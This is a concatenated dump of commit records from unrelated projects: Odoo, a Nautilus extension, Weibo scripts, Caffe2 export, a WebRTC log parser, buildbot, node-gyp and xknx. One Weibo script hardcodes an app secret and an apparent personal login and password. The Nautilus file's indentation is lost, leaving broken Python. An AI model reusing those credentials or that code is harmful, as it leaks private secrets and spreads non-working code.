o,ccomb/OpenUpgrade,minhtuancn/odoo,shingonoide/odoo,Maspear/odoo,KontorConsulting/odoo,Ichag/odoo,SerpentCS/odoo,steedos/odoo,dkubiak789/odoo,rubencabrera/odoo,Grirrane/odoo,hopeall/odoo,nhomar/odoo-mirror,goliveirab/odoo,a
rthru/OpenUpgrade,0k/odoo,NL66278/OCB,storm-computers/odoo,fgesora/odoo,fossoult/odoo,hmen89/odoo,apanju/odoo,ramitalat/odoo,charbeljc/OCB,datenbetrieb/odoo,shaufi10/odoo,Endika/OpenUpgrade,guewen/OpenUpgrade,shivam1111/odoo,PongPi/isl-odoo,sadleader/odoo,ihsanudin/odoo,stephen144/odoo,odoo-turkiye/odoo,kittiu/odoo,slevenhagen/odoo-npg,jusdng/odoo,gorjuce/odoo,dsfsdgsbngfggb/odoo,omprakasha/odoo,SerpentCS/odoo,takis/odoo,fjbatresv/odoo,luiseduardohdbackup/odoo,erkrishna9/odoo,fjbatresv/odoo,xzYue/odoo,srimai/odoo,matrixise/odoo,mmbtba/odoo,VielSoft/odoo,numerigraphe/odoo,Nowheresly/odoo,mszewczy/odoo,blaggacao/OpenUpgrade,mvaled/OpenUpgrade,odoo-turkiye/odoo,waytai/odoo,stonegithubs/odoo,erkrishna9/odoo,Bachaco-ve/odoo,syci/OCB,srsman/odoo,Daniel-CA/odoo,JonathanStein/odoo,funkring/fdoo,dsfsdgsbngfggb/odoo,kirca/OpenUpgrade,optima-ict/odoo,luiseduardohdbackup/odoo,jeasoft/odoo,laslabs/odoo,fdvarela/odoo8,provaleks/o8,deKupini/erp,stonegithubs/odoo,ShineFan/odoo,ovnicraft/odoo,markeTIC/OCB,jusdng/odoo,hopeall/odoo,QianBIG/odoo,Maspear/odoo,arthru/OpenUpgrade,waytai/odoo,kifcaliph/odoo,demon-ru/iml-crm,odoo-turkiye/odoo,AuyaJackie/odoo,CopeX/odoo,apocalypsebg/odoo,feroda/odoo,hip-odoo/odoo,dariemp/odoo,pplatek/odoo,dfang/odoo,Codefans-fan/odoo,nhomar/odoo-mirror,alhashash/odoo,avoinsystems/odoo,bguillot/OpenUpgrade,havt/odoo,Nick-OpusVL/odoo,CatsAndDogsbvba/odoo,rowemoore/odoo,demon-ru/iml-crm,dfang/odoo,jeasoft/odoo,jpshort/odoo,odoousers2014/odoo,Adel-Magebinary/odoo,alexcuellar/odoo,slevenhagen/odoo-npg,hbrunn/OpenUpgrade,hbrunn/OpenUpgrade,cpyou/odoo,QianBIG/odoo,jpshort/odoo,cdrooom/odoo,x111ong/odoo,stephen144/odoo,nagyistoce/odoo-dev-odoo,shingonoide/odoo,ehirt/odoo,SerpentCS/odoo,OpenUpgrade-dev/OpenUpgrade,nuncjo/odoo,bealdav/OpenUpgrade,takis/odoo,fgesora/odoo,rubencabrera/odoo,guewen/OpenUpgrade,Codefans-fan/odoo,CubicERP/odoo,massot/odoo,funkring/fdoo,BT-rmartin/odoo,guewen/OpenUpgrade,OpenUpgrade/OpenUpgrade,andreparames/odoo,dsfsdgsbngfggb/odoo,spadae22/
odoo,dariemp/odoo,xzYue/odoo,elmerdpadilla/iv,minhtuancn/odoo,guerrerocarlos/odoo,makinacorpus/odoo,SAM-IT-SA/odoo,JCA-Developpement/Odoo,abdellatifkarroum/odoo,sv-dev1/odoo,tarzan0820/odoo,RafaelTorrealba/odoo,hubsaysnuaa/odoo,andreparames/odoo,pplatek/odoo,bakhtout/odoo-educ,thanhacun/odoo,pedrobaeza/OpenUpgrade,stephen144/odoo,Noviat/odoo,grap/OpenUpgrade,draugiskisprendimai/odoo,colinnewell/odoo,klunwebale/odoo,florentx/OpenUpgrade,VielSoft/odoo,rubencabrera/odoo,nitinitprof/odoo,alqfahad/odoo,hubsaysnuaa/odoo,arthru/OpenUpgrade,sebalix/OpenUpgrade,CubicERP/odoo,alhashash/odoo,ihsanudin/odoo,tvtsoft/odoo8,grap/OpenUpgrade,waytai/odoo,ramitalat/odoo,FlorianLudwig/odoo,Maspear/odoo,hoatle/odoo,Maspear/odoo,pedrobaeza/odoo,CatsAndDogsbvba/odoo,papouso/odoo,sv-dev1/odoo,pplatek/odoo,dezynetechnologies/odoo,BT-rmartin/odoo,gsmartway/odoo,virgree/odoo,windedge/odoo,cysnake4713/odoo,feroda/odoo,grap/OpenUpgrade,SAM-IT-SA/odoo,Maspear/odoo,hassoon3/odoo,jolevq/odoopub,charbeljc/OCB,pplatek/odoo,osvalr/odoo,fuhongliang/odoo,AuyaJackie/odoo,dariemp/odoo,bealdav/OpenUpgrade,klunwebale/odoo,kittiu/odoo,realsaiko/odoo,ramitalat/odoo,xzYue/odoo,ClearCorp-dev/odoo,nuuuboo/odoo,acshan/odoo,jfpla/odoo,avoinsystems/odoo,Daniel-CA/odoo,mmbtba/odoo,lombritz/odoo,ygol/odoo,makinacorpus/odoo,ApuliaSoftware/odoo,jusdng/odoo,ThinkOpen-Solutions/odoo,tinkerthaler/odoo,abenzbiria/clients_odoo,naousse/odoo,alqfahad/odoo,rowemoore/odoo,Antiun/odoo,oihane/odoo,Nowheresly/odoo,vnsofthe/odoo,savoirfairelinux/OpenUpgrade,slevenhagen/odoo-npg,jaxkodex/odoo,steedos/odoo,csrocha/OpenUpgrade,luiseduardohdbackup/odoo,eino-makitalo/odoo,ubic135/odoo-design,incaser/odoo-odoo,andreparames/odoo,Elico-Corp/odoo_OCB,odootr/odoo,MarcosCommunity/odoo,savoirfairelinux/OpenUpgrade,shingonoide/odoo,wangjun/odoo,fossoult/odoo,damdam-s/OpenUpgrade,takis/odoo,factorlibre/OCB,fevxie/odoo,bguillot/OpenUpgrade,joariasl/odoo,lgscofield/odoo,incaser/odoo-odoo,shaufi/odoo,Ichag/odoo,pedrobaeza/odoo,JGarcia-Panach/odoo
,rahuldhote/odoo,salaria/odoo,apocalypsebg/odoo,RafaelTorrealba/odoo,dgzurita/odoo,gvb/odoo,nuncjo/odoo,microcom/odoo,bkirui/odoo,acshan/odoo,Endika/odoo,juanalfonsopr/odoo,ovnicraft/odoo,tvibliani/odoo,hanicker/odoo,synconics/odoo,kybriainfotech/iSocioCRM,srimai/odoo,dezynetechnologies/odoo,kybriainfotech/iSocioCRM,BT-fgarbely/odoo,jesramirez/odoo,ShineFan/odoo,slevenhagen/odoo,lightcn/odoo,syci/OCB,draugiskisprendimai/odoo,oasiswork/odoo,csrocha/OpenUpgrade,havt/odoo,fuselock/odoo,shaufi/odoo,hmen89/odoo,sergio-incaser/odoo,Noviat/odoo,rahuldhote/odoo,synconics/odoo,makinacorpus/odoo,shingonoide/odoo,rahuldhote/odoo,sebalix/OpenUpgrade,cysnake4713/odoo,alqfahad/odoo,Daniel-CA/odoo,Danisan/odoo-1,stephen144/odoo,Eric-Zhong/odoo,bwrsandman/OpenUpgrade,funkring/fdoo,tarzan0820/odoo,nuncjo/odoo,zchking/odoo,jiachenning/odoo,jeasoft/odoo,cloud9UG/odoo,deKupini/erp,odooindia/odoo,abstract-open-solutions/OCB,Noviat/odoo,abstract-open-solutions/OCB,pedrobaeza/odoo,florian-dacosta/OpenUpgrade | addons/purchase_requisition/__openerp__.py | addons/purchase_requisition/__openerp__.py | ##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# OpenERP/Odoo addon manifest: a single dict literal describing the module.
{
    'name': 'Purchase Requisitions',
    'version': '0.1',
    'author': 'OpenERP SA',
    'category': 'Purchase Management',
    'images': ['images/purchase_requisitions.jpeg'],
    'website': 'http://www.openerp.com',
    'description': """
This module allows you to manage your Purchase Requisition.
===========================================================
When a purchase order is created, you now have the opportunity to save the
related requisition. This new object will regroup and will allow you to easily
keep track and order all your purchase orders.
""",
    # Modules that must be installed first.
    'depends' : ['purchase'],
    # Client-side assets loaded by the web client.
    'js': [
        'static/src/js/web_addons.js',
    ],
    'demo': ['purchase_requisition_demo.xml'],
    # Data files loaded at install/upgrade time; order matters (security
    # and data records before the views that reference them).
    'data': ['security/purchase_tender.xml',
        'wizard/purchase_requisition_partner_view.xml',
        'wizard/bid_line_qty_view.xml',
        'purchase_requisition_data.xml',
        'purchase_requisition_view.xml',
        'purchase_requisition_report.xml',
        'purchase_requisition_workflow.xml',
        'security/ir.model.access.csv','purchase_requisition_sequence.xml',
        'views/report_purchaserequisition.xml',
    ],
    'auto_install': False,
    # YAML test scenarios run by the server test framework.
    'test': [
        'test/purchase_requisition_users.yml',
        'test/purchase_requisition_demo.yml',
        'test/cancel_purchase_requisition.yml',
        'test/purchase_requisition.yml',
    ],
    'installable': True,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| ##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# OpenERP/Odoo addon manifest: a single dict literal describing the module.
{
    'name': 'Purchase Requisitions',
    'version': '0.1',
    'author': 'OpenERP SA',
    'category': 'Purchase Management',
    'images': ['images/purchase_requisitions.jpeg'],
    'website': 'http://www.openerp.com',
    'description': """
This module allows you to manage your Purchase Requisition.
===========================================================
When a purchase order is created, you now have the opportunity to save the
related requisition. This new object will regroup and will allow you to easily
keep track and order all your purchase orders.
""",
    # Modules that must be installed first.
    'depends' : ['purchase'],
    'js': [
        'static/src/js/web_addons.js',
    ],
    'demo': ['purchase_requisition_demo.xml'],
    # Data files loaded at install/upgrade time; order matters.
    'data': ['security/purchase_tender.xml',
        'wizard/purchase_requisition_partner_view.xml',
        'wizard/bid_line_qty_view.xml',
        'purchase_requisition_data.xml',
        'purchase_requisition_view.xml',
        'purchase_requisition_report.xml',
        'purchase_requisition_workflow.xml',
        # The comma after the .csv entry is required: without it, Python's
        # implicit string concatenation fused the two neighbouring paths
        # into one nonexistent file name and the report view never loaded.
        'security/ir.model.access.csv', 'purchase_requisition_sequence.xml',
        'views/report_purchaserequisition.xml',
    ],
    'auto_install': False,
    # YAML test scenarios run by the server test framework.
    'test': [
        'test/purchase_requisition_users.yml',
        'test/purchase_requisition_demo.yml',
        'test/cancel_purchase_requisition.yml',
        'test/purchase_requisition.yml',
    ],
    'installable': True,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | Python |
72738366fa074b457021faab0c21c3b89070b5ad | Add first revision of Nautilus extension. | wizbit-archive/wizbit,wizbit-archive/wizbit | nautilus/wizbit-extension.py | nautilus/wizbit-extension.py | from urlparse import urlparse
from os.path import exists, split, isdir
import nautilus
from lxml import etree
WIZ_CONTROLLED = "wiz-controlled"
WIZ_CONFLICT = "wiz-conflict"
YES = "Yes"
NO = "No"
class WizbitExtension(nautilus.ColumnProvider, nautilus.InfoProvider):
def __init__(self):
pass
def get_columns(self):
return [nautilus.Column("NautilusWizbit::is_controlled",
WIZ_CONTROLLED,
"Wizbit Controlled",
"File may be syncronized by Wizbit"),
nautilus.Column("NautilusWizbit::has_conflict",
WIZ_CONFLICT,
"Wizbit Conflict",
"File may have multiple versions that need to be resolved")]
def update_file_info(self, file):
controlled = False
conflict = False
(scheme, netloc, path, params, query, fragment) = urlparse(file.get_uri())
if scheme != 'file':
return
wizpath = self.get_wizpath(path)
if wizpath:
if isdir(path):
controlled = True
else:
try:
repos = etree.parse (wizpath + "/.wizbit/repos")
except IOError:
pass
else:
#Find if file is controlled
files = [f.text for f in repos.getroot().xpath("/wizbit/repo/file")]
(path, filename) = split(path)
if filename in files:
controlled = True
#Find if file is conflicting
repel = repos.getroot().xpath("/wizbit/repo")
for r in repel:
if r.get("name") == filename + ".git":
heads = [h for h in r if h.tag == "head"]
if len(heads) > 1:
conflict = True
if controlled:
file.add_emblem("cvs-controlled")
file.add_string_attribute(WIZ_CONTROLLED, YES)
else:
file.add_string_attribute(WIZ_CONTROLLED, NO)
if conflict:
file.add_emblem("cvs-conflict")
file.add_string_attribute(WIZ_CONFLICT, YES)
else:
file.add_string_attribute(WIZ_CONFLICT, NO)
def get_wizpath(self, path):
if exists(path + "/.wizbit/repos"):
return path
else:
(head, tail) = split(path)
if head != '/':
return self.get_wizpath(head)
else:
if exists("/.wizbit/repos"):
return head
else:
return ""
| lgpl-2.1 | Python |
|
2a9858381a78bd9ff9ff459a23f73630237e6669 | send vm | Heipiao/weibo,Heipiao/weibo | weibo_data_input.py | weibo_data_input.py | __author__ = 'heipiao'
# -*- coding: utf-8 -*-
from weibo import APIClient
import urllib2
import urllib
#APP_KEY和APP_SECRET,需要新建一个微博应用才能得到
APP_KEY = '3722673574'
APP_SECRET = '7a6de53498caf87e655a98fa2f8912bf'
#管理中心---应用信息---高级信息,将"授权回调页"的值改成https://api.weibo.com/oauth2/default.html
CALLBACK_URL = 'https://api.weibo.com/oauth2/default.html'
AUTH_URL = 'https://api.weibo.com/oauth2/authorize'
def GetCode(userid,passwd):
client = APIClient(app_key = APP_KEY, app_secret=APP_SECRET, redirect_uri=CALLBACK_URL)
referer_url = client.get_authorize_url()
postdata = {
"action": "login",
"client_id": APP_KEY,
"redirect_uri":CALLBACK_URL,
"userId": userid,
"passwd": passwd,
}
headers = {
"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0",
"Referer":referer_url,
"Connection":"keep-alive"
}
req = urllib2.Request(
url = AUTH_URL,
data = urllib.urlencode(postdata),
headers = headers
)
resp = urllib2.urlopen(req)
return resp.geturl()[-32:]
if __name__ == "__main__":
print GetCode("15029357121","liu8315") | mit | Python |
|
7b899fbcf7a661758ab2a9cdca7ade6c461c8e65 | add c model | Oscarlight/PiNN_Caffe2,Oscarlight/PiNN_Caffe2,Oscarlight/PiNN_Caffe2,Oscarlight/PiNN_Caffe2 | transiNXOR_modeling/caffe2_tensor_to_c_array.py | transiNXOR_modeling/caffe2_tensor_to_c_array.py | import sys
sys.path.append('../')
import caffe2_paths
from caffe2.python import workspace
from pinn import exporter
from scipy.io import savemat
import numpy as np
import pickle
model_name = 'bise_h216_0'
# Load the serialized Caffe2 init net holding the trained parameters.
init_net = exporter.load_init_net('./transiXOR_Models/' + model_name + '_init')
print(type(init_net))

# Dump every parameter tensor as a C float-array definition.
with open("c_model/c_arrays.txt", "w") as f:
    for op in init_net.op:
        tensor = workspace.FetchBlob(op.output[0])
        # '/' is not valid in a C identifier; flatten the blob path.
        tensor_name = op.output[0].replace('/', '_')
        print(tensor_name)
        print(tensor.shape)
        tensor_str = np.array2string(tensor.flatten(), separator=',')
        tensor_str = tensor_str.replace("[", "{").replace("]", "}")
        c_decl = 'float ' + tensor_name + '[] = ' + tensor_str + ';\n'
        f.write(c_decl)

## Preprocess param
with open("./transiXOR_Models/" + model_name + "_preproc_param.p", "rb") as f:
    preproc_dict = pickle.load(f)
print(preproc_dict)
| mit | Python |
|
7be9e42f6c870004a5aa9b123b9f28c8f95f5b88 | Add Parser to analyse the results of the network tester. | TimothyGu/libilbc,ShiftMediaProject/libilbc,TimothyGu/libilbc,TimothyGu/libilbc,TimothyGu/libilbc,ShiftMediaProject/libilbc,TimothyGu/libilbc,ShiftMediaProject/libilbc,ShiftMediaProject/libilbc,ShiftMediaProject/libilbc | webrtc/tools/network_tester/parse_packet_log.py | webrtc/tools/network_tester/parse_packet_log.py | # Copyright (c) 2017 The WebRTC project authors. All Rights Reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
# To run this script please copy "out/<build_name>/pyproto/webrtc/tools/
# network_tester/network_tester_packet_pb2.py" next to this script.
# The you can run this script with:
# "python parse_packet_log.py -f packet_log.dat"
# for more information call:
# "python parse_packet_log.py --help"
from optparse import OptionParser
import struct
import matplotlib.pyplot as plt
import network_tester_packet_pb2
def GetSize(file_to_parse):
    """Read the one-byte length prefix of the next packet record.

    Returns 0 at end of file; otherwise the signed byte value.
    """
    data = file_to_parse.read(1)
    # BUG FIX: the file is opened in binary mode, so EOF yields b''.
    # Comparing against the text literal '' never matched on Python 3 and
    # struct.unpack then crashed on the empty buffer. Truthiness covers both.
    if not data:
        return 0
    return struct.unpack('<b', data)[0]
def ParsePacketLog(packet_log_file_to_parse):
    """Parse a packet log of length-prefixed NetworkTesterPacket protos.

    Reads records until a zero length prefix (EOF) or a read error and
    returns the decoded packets as a list.
    """
    packets = []
    with open(packet_log_file_to_parse, 'rb') as file_to_parse:
        while True:
            size = GetSize(file_to_parse)
            if size == 0:
                break
            try:
                packet = network_tester_packet_pb2.NetworkTesterPacket()
                packet.ParseFromString(file_to_parse.read(size))
            except IOError:
                break
            packets.append(packet)
    return packets
def GetTimeAxis(packets):
    """Return arrival times in seconds, relative to the first packet."""
    first_arrival_time = packets[0].arrival_timestamp
    axis = []
    for packet in packets:
        # Timestamps are in microseconds; convert to seconds.
        axis.append((packet.arrival_timestamp - first_arrival_time) / 1000000.0)
    return axis
def CreateSendTimeDiffPlot(packets, plot):
    """Plot one-way delay variation (arrival minus send time, in us).

    The first packet's delay is used as the zero reference, so the curve
    shows relative jitter rather than absolute clock offset.
    """
    first_send_time_diff = (
        packets[0].arrival_timestamp - packets[0].send_timestamp)
    diffs = [(packet.arrival_timestamp - packet.send_timestamp) -
             first_send_time_diff
             for packet in packets]
    plot.grid(True)
    plot.set_title("SendTime difference [us]")
    plot.plot(GetTimeAxis(packets), diffs)
class MovingAverageBitrate(object):
    """Sliding one-second window that tracks received bits per second."""

    def __init__(self):
        self.packet_window = []
        # Window length in microseconds (1 second).
        self.window_time = 1000000
        # Total payload bytes currently inside the window.
        self.bytes = 0
        self.latest_packet_time = 0
        self.send_interval = 0

    def RemoveOldPackets(self):
        """Drop packets older than the window relative to the latest packet.

        BUG FIX: the original removed elements from ``packet_window`` while
        iterating over the same list, which skips the element following each
        removal and leaves expired packets (and their bytes) in the window.
        Collect the expired packets first, then remove them.
        """
        expired = [packet for packet in self.packet_window
                   if (self.latest_packet_time - packet.arrival_timestamp >
                       self.window_time)]
        for packet in expired:
            self.bytes = self.bytes - packet.packet_size
            self.packet_window.remove(packet)

    def AddPacket(self, packet):
        """This functions returns bits / second"""
        self.send_interval = packet.arrival_timestamp - self.latest_packet_time
        self.latest_packet_time = packet.arrival_timestamp
        self.RemoveOldPackets()
        self.packet_window.append(packet)
        self.bytes = self.bytes + packet.packet_size
        return self.bytes * 8
def CreateReceiveBiratePlot(packets, plot):
    """Plot the moving-average receive bitrate over the packet stream."""
    bitrate = MovingAverageBitrate()
    rates = [bitrate.AddPacket(packet) for packet in packets]
    plot.grid(True)
    plot.set_title("Receive birate [bps]")
    plot.plot(GetTimeAxis(packets), rates)
def CreatePacketlossPlot(packets, plot):
    """Plot a 0/1 packet-loss trace over the received sequence-number range.

    Received sequence numbers are drawn as 0 at their arrival time; missing
    sequence numbers are drawn as 1 at an extrapolated time (last arrival
    plus the most recent inter-arrival gap).
    """
    packets_look_up = {}
    first_sequence_number = packets[0].sequence_number
    last_sequence_number = packets[-1].sequence_number
    for packet in packets:
        packets_look_up[packet.sequence_number] = packet
    y = []
    x = []
    first_arrival_time = 0
    last_arrival_time = 0
    last_arrival_time_diff = 0
    for sequence_number in range(first_sequence_number,
                                 last_sequence_number + 1):
        if sequence_number in packets_look_up:
            y.append(0)
            if first_arrival_time == 0:
                # First received packet anchors the time axis.
                first_arrival_time = \
                    packets_look_up[sequence_number].arrival_timestamp
            x_time = (packets_look_up[sequence_number].arrival_timestamp -
                      first_arrival_time)
            if last_arrival_time != 0:
                last_arrival_time_diff = x_time - last_arrival_time
            last_arrival_time = x_time
            x.append(x_time / 1000000.0)
        else:
            # Lost packet: estimate when it would have arrived.
            if last_arrival_time != 0 and last_arrival_time_diff != 0:
                x.append((last_arrival_time + last_arrival_time_diff) /
                         1000000.0)
                y.append(1)
    plot.grid(True)
    plot.set_title("Lost packets [0/1]")
    plot.plot(x, y)
def main():
    """Parse the packet log named on the command line and show three plots."""
    parser = OptionParser()
    parser.add_option("-f",
                      "--packet_log_file",
                      dest="packet_log_file",
                      help="packet_log file to parse")
    options = parser.parse_args()[0]
    packets = ParsePacketLog(options.packet_log_file)
    # Three stacked sub-plots sharing one time axis.
    figure, (top, middle, bottom) = plt.subplots(3, sharex=True)
    plt.xlabel('time [sec]')
    CreateSendTimeDiffPlot(packets, top)
    CreateReceiveBiratePlot(packets, middle)
    CreatePacketlossPlot(packets, bottom)
    figure.subplots_adjust(hspace=0.3)
    plt.show()


if __name__ == "__main__":
    main()
| bsd-3-clause | Python |
|
f3cab8d72b9a070305f4f2c44922e381ea091205 | add context manager example | h2non/riprova | examples/context_manager.py | examples/context_manager.py | # -*- coding: utf-8 -*-
import riprova
# Store number of function calls for error simulation
calls = 0
# Register retriable operation with custom evaluator
def mul2(x):
global calls
if calls < 4:
calls += 1
raise RuntimeError('simulated call error')
return x * 2
# Run task via context manager
with riprova.Retrier() as retry:
result = retry.run(mul2, 2)
print('Result 1: {}'.format(result))
# Or alternatively create a shared retrier and reuse it across multiple
# context managers.
retrier = riprova.Retrier()
with retrier as retry:
calls = 0
result = retry.run(mul2, 4)
print('Result 2: {}'.format(result))
with retrier as retry:
calls = 0
result = retry.run(mul2, 8)
print('Result 3: {}'.format(result))
| mit | Python |
|
24cf3c2676e4ea7342e95e6a37857c6fa687865e | Remove managers for article obj. | BirkbeckCTP/janeway,BirkbeckCTP/janeway,BirkbeckCTP/janeway,BirkbeckCTP/janeway | src/submission/migrations/0058_auto_20210812_1254.py | src/submission/migrations/0058_auto_20210812_1254.py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2021-08-12 12:54
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Remove the custom managers previously declared on the article model."""

    dependencies = [
        ('submission', '0057_merge_20210811_1506'),
    ]

    operations = [
        migrations.AlterModelManagers(
            name='article',
            managers=[],
        ),
    ]
| agpl-3.0 | Python |
|
9687ca646dd7ae5a7ff31e5b8657fb1ab88a0f5e | add buildbot | steinwurf/bourne,steinwurf/bourne | buildbot.py | buildbot.py | #!/usr/bin/env python
# encoding: utf-8
import sys
import json
import subprocess
project_name = 'bourne'
def run_command(args):
    """Log the waf command line that would be run.

    The real invocation is currently disabled (kept below for reference),
    so this is effectively a dry-run logger.
    """
    print("Running: %s" % (args,))
    # sys.stdout.flush()
    # subprocess.check_call(args)
def get_tool_options(properties):
    """Translate the optional 'tool_options' mapping into waf CLI flags.

    A ``None`` value becomes a bare ``--key`` flag; anything else becomes
    ``--key=value``. Returns an empty list when no options are present.
    """
    options = []
    for key, value in properties.get('tool_options', {}).items():
        if value is None:
            options.append('--{0}'.format(key))
        else:
            options.append('--{0}={1}'.format(key, value))
    return options
def configure(properties):
    """Build and run the 'waf configure' command for this buildbot step."""
    command = [sys.executable, 'waf']
    # Optionally wipe previous build output first.
    if properties.get('build_distclean'):
        command.append('distclean')
    command += ['configure', '--git-protocol=git@']
    if 'waf_bundle_path' in properties:
        command.append('--bundle-path=' + properties['waf_bundle_path'])
    if 'dependency_project' in properties:
        command.append('--{0}-use-checkout={1}'.format(
            properties['dependency_project'],
            properties['dependency_checkout']))
    command.append("--cxx_mkspec={}".format(properties['cxx_mkspec']))
    command += get_tool_options(properties)
    run_command(command)
def build(properties):
    """Run the verbose 'waf build' step."""
    run_command([sys.executable, 'waf', 'build', '-v'])
def run_tests(properties):
    """Run the waf test step, optionally wrapping binaries in valgrind."""
    command = [sys.executable, 'waf', '-v', '--run_tests']
    if properties.get('valgrind_run'):
        run_cmd = 'valgrind --error-exitcode=1 %s --profile=embedded'
    else:
        run_cmd = '%s'
    # run_cmd is always non-empty here, so the flag is always appended
    # (matches the original script's behavior).
    command.append("--run_cmd={}".format(run_cmd))
    command += get_tool_options(properties)
    run_command(command)
def install(properties):
    """Run the 'waf install' step with optional path/relative overrides."""
    command = [sys.executable, 'waf', '-v', 'install']
    if 'install_path' in properties:
        command.append('--install_path={0}'.format(properties['install_path']))
    if properties.get('install_relative'):
        command.append('--install_relative')
    run_command(command)
def coverage_settings(options):
    """Fill in the coverage thresholds used by the buildbot harness."""
    options['required_line_coverage'] = 0.0
def main():
    """Dispatch ``buildbot.py <command> <json-properties>`` to a step function."""
    argv = sys.argv
    if len(argv) != 3:
        print("Usage: {} <command> <properties>".format(argv[0]))
        # BUG FIX: a usage error previously exited with status 0, which CI
        # would interpret as success. Exit non-zero instead.
        sys.exit(1)
    cmd = argv[1]
    properties = json.loads(argv[2])
    if cmd == 'configure':
        configure(properties)
    elif cmd == 'build':
        build(properties)
    elif cmd == 'run_tests':
        run_tests(properties)
    elif cmd == 'install':
        install(properties)
    else:
        print("Unknown command: {}".format(cmd))
        # BUG FIX: an unknown command also used to fall through with exit 0.
        sys.exit(1)


if __name__ == '__main__':
    main()
| bsd-3-clause | Python |
|
0f6866a91e4d8af2faedf2af277ad0df573536aa | Set win_delay_load_hook to false | atom/node-runas,dbkaplun/node-runas,dustinblackman/node-runas,dbkaplun/node-runas,dustinblackman/node-runas,pombredanne/node-runas,atom/node-runas,pombredanne/node-runas | binding.gyp | binding.gyp | {
'target_defaults': {
'win_delay_load_hook': 'false',
'conditions': [
['OS=="win"', {
'msvs_disabled_warnings': [
4530, # C++ exception handler used, but unwind semantics are not enabled
4506, # no definition for inline function
],
}],
],
},
'targets': [
{
'target_name': 'runas',
'sources': [
'src/main.cc',
],
'include_dirs': [
'<!(node -e "require(\'nan\')")'
],
'conditions': [
['OS=="win"', {
'sources': [
'src/runas_win.cc',
],
'libraries': [
'-lole32.lib',
'-lshell32.lib',
],
}],
['OS=="mac"', {
'sources': [
'src/runas_darwin.cc',
'src/fork.cc',
'src/fork.h',
],
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/Security.framework',
],
}],
['OS not in ["mac", "win"]', {
'sources': [
'src/runas_posix.cc',
'src/fork.cc',
'src/fork.h',
],
}],
],
}
]
}
| {
'target_defaults': {
'conditions': [
['OS=="win"', {
'msvs_disabled_warnings': [
4530, # C++ exception handler used, but unwind semantics are not enabled
4506, # no definition for inline function
],
}],
],
},
'targets': [
{
'target_name': 'runas',
'sources': [
'src/main.cc',
],
'include_dirs': [
'<!(node -e "require(\'nan\')")'
],
'conditions': [
['OS=="win"', {
'sources': [
'src/runas_win.cc',
],
'libraries': [
'-lole32.lib',
'-lshell32.lib',
],
}],
['OS=="mac"', {
'sources': [
'src/runas_darwin.cc',
'src/fork.cc',
'src/fork.h',
],
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/Security.framework',
],
}],
['OS not in ["mac", "win"]', {
'sources': [
'src/runas_posix.cc',
'src/fork.cc',
'src/fork.h',
],
}],
],
}
]
}
| mit | Python |
0d6da71cb759c3819133baa3d7c043fb92df425e | Create weibo.py | sanbaideng/GetWeiboInfoByPython | 2/weibo.py | 2/weibo.py | from bs4 import BeautifulSoup
import json
import ConfigParser
import urllib2
from util import get_content
link_id = 18
cf = ConfigParser.ConfigParser()
cf.read("config.ini")
weiyinUrl = 'http://wb.weiyin.cc/Book/BookView/W440164363452#' + str(link_id)
content = urllib2.urlopen(weiyinUrl)
html = content.read()
soup = BeautifulSoup(html)
weibo = soup.find("div",attrs="head_title").find("p").text
print html
print weibo
| mit | Python |
|
666caee40af2dccc30e78d52f8de962110408146 | Add fan device | XKNX/xknx,XKNX/xknx | xknx/devices/fan.py | xknx/devices/fan.py | """
Module for managing a fan via KNX.
It provides functionality for
* setting fan to specific speed
* reading the current speed from KNX bus.
"""
import asyncio
from .device import Device
from .remote_value_scaling import RemoteValueScaling
class Fan(Device):
    """Class for managing a fan."""

    # pylint: disable=too-many-instance-attributes
    # pylint: disable=too-many-public-methods

    def __init__(self,
                 xknx,
                 name,
                 group_address_speed=None,
                 group_address_speed_state=None,
                 device_updated_cb=None):
        """Initialize fan class."""
        # pylint: disable=too-many-arguments
        Device.__init__(self, xknx, name, device_updated_cb)
        # Fan speed is exposed on the bus as a 0..100 scaling value.
        self.speed = RemoteValueScaling(
            xknx,
            group_address_speed,
            group_address_speed_state,
            device_name=self.name,
            after_update_cb=self.after_update,
            range_from=0,
            range_to=100)

    @classmethod
    def from_config(cls, xknx, name, config):
        """Initialize object from configuration structure."""
        group_address_speed = \
            config.get('group_address_speed')
        group_address_speed_state = \
            config.get('group_address_speed_state')
        return cls(
            xknx,
            name,
            group_address_speed=group_address_speed,
            group_address_speed_state=group_address_speed_state)

    def has_group_address(self, group_address):
        """Test if device has given group address."""
        return self.speed.has_group_address(group_address)

    def __str__(self):
        """Return object as readable string."""
        return '<Fan name="{0}" ' \
            'speed="{1}" />' \
            .format(
                self.name,
                self.speed.group_addr_str())

    @asyncio.coroutine
    def set_speed(self, speed):
        """Set the fan to a designated speed (0..100)."""
        yield from self.speed.set(speed)

